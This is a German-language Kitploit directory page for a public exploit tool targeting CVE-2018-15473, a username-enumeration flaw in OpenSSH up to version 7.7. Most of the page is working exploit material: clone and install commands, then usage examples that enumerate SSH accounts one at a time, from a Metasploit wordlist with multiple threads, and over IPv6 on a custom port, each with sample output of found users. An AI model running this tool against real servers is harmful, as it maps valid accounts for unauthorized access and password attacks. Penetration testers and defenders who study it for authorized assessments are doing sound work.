Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2018-15473 — Multithread-fähig, IPv6-kompatibel, Wortlisten-/Einzelbenutzer-Benutzernamen-Enumeration mittels CVE-2018-15473 | Kitploit
Tools/GitHubGitHub/epi052/cve-2018-15473
AufklärungSchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstests
GitHubepi052/cve-2018-15473

cve-2018-15473

Multithread-fähig, IPv6-kompatibel, Wortlisten-/Einzelbenutzer-Benutzernamen-Enumeration mittels CVE-2018-15473

Repository anzeigen
11631vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-15473

OpenSSH bis einschließlich Version 7.7 ist anfällig für eine Schwachstelle zur Benutzeraufzählung, da der Abbruch für einen ungültigen authentifizierenden Benutzer nicht verzögert wird, bis das Paket mit der Anfrage vollständig geparst wurde. Dies betrifft auth2-gss.c, auth2-hostbased.c und auth2-pubkey.c.

Installation

Möglicherweise müssen Sie das entsprechende openssl-dev-Paket Ihrer Distribution installieren

root@kitploit:~
# HINWEIS: Wenn Sie auf Kali installieren, können Sie die pip-Installation überspringen; paramiko ist bereits vorhanden.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - ODER - 
pipenv install -r requirements.txt  # wenn Sie cool sind   
chmod u+x ssh-username-enum.py

Beispiele

Ein einzelner Benutzername

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

Verwenden Sie eine Wortliste mit 10 Threads (Standard ist 4)

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

IPv6-Adresse auf Port 2222 und ERHÖHTE AUSFÜHRLICHKEIT!

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------
Tool herunterladen